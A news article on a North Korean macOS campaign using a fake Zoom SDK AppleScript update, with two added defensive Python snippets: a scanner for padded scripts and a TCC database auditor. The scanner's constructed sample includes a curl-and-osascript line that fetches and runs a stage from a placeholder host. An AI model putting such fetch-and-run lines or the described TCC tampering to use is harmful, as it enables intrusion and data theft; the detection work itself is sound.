
Fake Zoom SDK Update Spreads Sapphire Sleet Malware in New macOS Attack Chain


North Korean Cyber Threat Group Shifts Tactics in Sophisticated macOS Attack

A recent report has unveiled a sophisticated cyber campaign targeting macOS users, orchestrated by the North Korean threat actor known as Sapphire Sleet. This operation marks a significant shift from traditional software exploitation techniques towards social engineering methods to manipulate users into executing malicious files.

Rather than seeking out vulnerabilities in macOS, Sapphire Sleet’s campaign relies on psychological manipulation. Victims are deceived into executing files that are disguised as legitimate software updates, which effectively allows the attackers to bypass Apple’s built-in security mechanisms. This represents an alarming evolution in tactics for cybersecurity professionals and macOS users alike.

At the center of this malicious campaign is a fraudulent file named “Zoom SDK Update.scpt.” This seemingly innocuous file is presented as part of a routine software update, luring users into downloading and opening it. The lure used by the attackers is particularly concerning: victims are approached through fake profiles on professional networking sites, where they go through a staged interview process that leads them to unwittingly download the malicious file.

Once the file is opened, it launches in Apple’s trusted Script Editor, giving the appearance of legitimacy by invoking benign system processes. This strategy reinforces the deceptive nature of the attack, making it challenging for average users to identify the threat. The script is meticulously crafted to mask its malicious intent. Initial decoy content provides fake update instructions, and thousands of blank lines conceal the actual harmful code from immediate detection.

Microsoft Threat Intelligence has verified the existence of this macOS-centric cyber campaign, detailing the steps Sapphire Sleet takes to compromise unsuspecting targets. After execution, the malicious script uses harmless system processes to present a façade of legitimacy. In the background, it covertly downloads additional payloads using command-line tools such as curl. The downloaded code is then executed in memory via osascript rather than being written to disk as a file, which evades detection by traditional file-based antivirus systems.
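The two traits the article describes (a short decoy followed by thousands of blank lines, then a stage that shells out to curl and re-invokes osascript) are simple to look for in a plain-text .scpt file. The following is an added detection example, not code from the article or from Microsoft; the sample scripts, the `example.invalid` URL and the `BLANK_RUN_THRESHOLD` value are constructed for the demonstration, and the threshold is an assumption to tune per environment.

```python
import re

# Constructed sample standing in for a padded AppleScript: a short decoy,
# thousands of blank lines, then the stage that fetches and runs more code.
SAMPLE_DECOY = "\n".join([
    '-- Zoom SDK Update',
    '-- Step 1: Quit Zoom before continuing.',
    '-- Step 2: Run this script to apply the update.',
    'display dialog "Checking for Zoom SDK updates..."',
]) + "\n" * 3000 + "\n".join([
    'set stage to "/tmp/update.txt"',
    'do shell script "curl -s https://example.invalid/stage2 -o " & stage',
    'do shell script "osascript " & stage',
])

# Constructed benign script for comparison.
SAMPLE_BENIGN = "\n".join([
    'tell application "Finder"',
    '    display dialog "Backup finished"',
    'end tell',
])

BLANK_RUN_THRESHOLD = 200  # assumption: tune to your environment

# Patterns the article associates with the second stage; the reason text is
# what goes into the finding so an analyst can see why a line was flagged.
SUSPICIOUS = [
    (r'do shell script\s+".*\bcurl\b', "shell-out to curl from AppleScript"),
    (r"\bosascript\b", "re-invokes osascript (in-memory second stage)"),
]

def longest_blank_run(text):
    """Length of the longest run of consecutive blank lines."""
    longest = run = 0
    for line in text.splitlines():
        if line.strip():
            run = 0
        else:
            run += 1
            longest = max(longest, run)
    return longest

def analyze_script(text):
    """Return a list of human-readable findings; empty means nothing flagged."""
    findings = []
    run = longest_blank_run(text)
    if run >= BLANK_RUN_THRESHOLD:
        findings.append(f"padding: {run} consecutive blank lines hide later code")
    for number, line in enumerate(text.splitlines(), 1):
        for pattern, why in SUSPICIOUS:
            if re.search(pattern, line):
                findings.append(f"line {number}: {why}")
    return findings

def is_suspicious(text):
    # Padding alone is odd but not conclusive; require a stage-two indicator too.
    findings = analyze_script(text)
    has_padding = any(f.startswith("padding") for f in findings)
    has_stage_two = any(f.startswith("line ") for f in findings)
    return has_padding and has_stage_two

if __name__ == "__main__":
    for name, text in (("decoy", SAMPLE_DECOY), ("benign", SAMPLE_BENIGN)):
        print(name, is_suspicious(text), analyze_script(text))
```

Run it against a directory of downloaded .scpt files (they are plain text when saved as "text" format; compiled .scpt files need to be decompiled first with `osadecompile`). The combination rule matters: plenty of legitimate scripts call curl, and generated scripts can contain padding, but both together in a file delivered through a recruitment conversation is the pattern the article describes.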

This multi-layered infection strategy enables Sapphire Sleet to establish persistent access to compromised systems, conduct thorough reconnaissance, and deploy multiple backdoors for future exploitation. One component of this malware, disguised as a system process named com.apple.cli, continuously collects system information and communicates with infrastructure controlled by the attackers.

In addition, the malware programmatically alters Apple’s Transparency, Consent, and Control (TCC) database, allowing unauthorized AppleScript operations to interact with sensitive system components without alerting the user. This manipulation opens the door to broader abuse, as the attackers can access a range of sensitive data without triggering the user prompts that would normally flag unauthorized actions.
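A defender can audit the TCC database for grants that no user ever approved. The following is an added example, not part of the article or of any Apple or Microsoft tooling; it assumes the `access` table of TCC.db uses the column names of the macOS 11+ schema (only a subset is modelled here), that `auth_value = 2` means "allowed", and that the sample rows (including a grant to a client named `com.apple.cli`, the process name the article mentions) are constructed for the demonstration.

```python
import sqlite3

# Services whose grants let a client drive other apps or read protected data.
SENSITIVE_SERVICES = {
    "kTCCServiceAppleEvents",
    "kTCCServiceSystemPolicyAllFiles",
    "kTCCServiceAccessibility",
}
ALLOWED = 2  # auth_value meaning "allowed" in the TCC access table

# Real locations of the system-wide and per-user databases on macOS.
SYSTEM_TCC_DB = "/Library/Application Support/com.apple.TCC/TCC.db"
USER_TCC_DB = "~/Library/Application Support/com.apple.TCC/TCC.db"

def open_tcc_db(path):
    """Open a TCC database read-only so an audit can never modify it."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)

def audit_tcc(conn, allowlist):
    """Return allowed grants for sensitive services to clients not on the allowlist."""
    rows = conn.execute(
        "SELECT service, client, indirect_object_identifier "
        "FROM access WHERE auth_value = ?",
        (ALLOWED,),
    )
    findings = []
    for service, client, target in rows:
        if service in SENSITIVE_SERVICES and client not in allowlist:
            findings.append({"service": service, "client": client, "target": target})
    return findings

def build_sample_db():
    """Constructed in-memory stand-in for TCC.db (assumed subset of the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE access (
        service TEXT, client TEXT, client_type INTEGER,
        auth_value INTEGER, auth_reason INTEGER,
        indirect_object_identifier TEXT, last_modified INTEGER)""")
    conn.executemany("INSERT INTO access VALUES (?,?,?,?,?,?,?)", [
        # A grant the user made through the normal prompt (sample row).
        ("kTCCServiceAppleEvents", "com.apple.ScriptEditor2", 0, 2, 2, "com.apple.finder", 1700000000),
        # Grants to an unexpected client, as if inserted directly (sample rows).
        ("kTCCServiceAppleEvents", "com.apple.cli", 0, 2, 3, "com.apple.finder", 1700000100),
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.cli", 0, 2, 3, "UNUSED", 1700000100),
        # A camera grant is not in the sensitive set and is ignored (sample row).
        ("kTCCServiceCamera", "us.zoom.xos", 0, 2, 2, "UNUSED", 1690000000),
    ])
    conn.commit()
    return conn

if __name__ == "__main__":
    known_good = {"com.apple.ScriptEditor2"}
    for finding in audit_tcc(build_sample_db(), known_good):
        print(finding)
```

On a real machine, reading either database requires the auditing process to hold Full Disk Access itself, and the allowlist should come from your MDM or software inventory rather than being hand-maintained. Comparing a fresh dump against a baseline taken at enrollment time catches the insertion the article describes even when the client name is chosen to look like an Apple process.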

With enhanced permissions, the malware initiates extensive data collection routines aimed at acquiring browser data, cryptocurrency wallet information, SSH keys, Telegram sessions, Apple Notes, and system logs. Credential theft is a significant aspect of the campaign, with a malicious app named “systemupdate.app” designed to present victims with a counterfeit macOS password prompt that closely resembles legitimate system dialogs.

This targeted approach is particularly dangerous, especially for individuals and organizations in the finance and cryptocurrency sectors, as the attackers aim specifically at wallet extensions and key materials. Such tactics underscore a critical reality for macOS users: even fully updated systems can be at risk if users are tricked into executing malicious actions.

The dual approach of credential harvesting and data exfiltration allows Sapphire Sleet to gain direct access to digital assets and sensitive accounts. Following the discovery of the campaign, Microsoft promptly shared its findings with Apple, which responded by deploying XProtect signatures and Safe Browsing updates aimed at detecting and blocking associated malware and infrastructure.

These protective measures are a step in the right direction; however, the campaign highlights an unsettling trend where attackers increasingly rely on manipulating user trust rather than capitalizing on software vulnerabilities. As threat actors refine their social engineering tactics and misuse trusted applications, the burden of security increasingly falls on user awareness, stringent execution controls, and multi-layered defense strategies rather than relying solely on platform protections.

In summary, the sophisticated nature of the Sapphire Sleet campaign serves as a stark reminder of the evolving landscape of cyber threats, where social engineering and user deception are becoming the preferred methods for exploitation. It calls for heightened vigilance among users and organizations alike to stay ahead of potential intrusions and protect sensitive information effectively.
